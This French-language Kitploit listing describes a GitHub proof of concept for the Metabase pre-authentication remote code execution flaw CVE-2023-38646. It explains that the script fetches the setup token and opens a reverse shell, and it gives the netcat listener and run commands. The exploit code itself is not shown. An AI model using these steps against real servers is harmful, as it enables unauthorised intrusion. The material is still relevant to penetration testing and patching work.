Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/mrunalkaran/cve-2023-38646
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubmrunalkaran/cve-2023-38646

CVE-2023-38646

POC RCE pré-authentification Metabase

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Metabase Pre-Auth RCE POC - CVE-2023-38646

Metabase open source avant 0.46.6.1 et Metabase Enterprise avant 1.46.6.1 permettent aux attaquants d'exécuter des commandes arbitraires sur le serveur. J'ai écrit le script directement pour obtenir un reverse shell sur la machine de l'attaquant.

Usage

Le script nécessite l'URL cible, l'IP de l'attaquant et le port. Fournir le setup token n'est pas requis pour cette exploitation car le script tente de l'obtenir depuis /api/session/properties.

Assurez-vous de démarrer un écouteur netcat sur la machine de l'attaquant, en utilisant la commande suivante : nc -nlvp {Port}

Exécutez le script POC avec :

  • -u - URL cible (Metabase)
  • -ip - IP de l'attaquant
  • -p - Numéro du port
root@kitploit:~
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>

POC

Références

  • https://github.com/m3m0o/metabase-pre-auth-rce-poc/
  • https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
Télécharger l’outil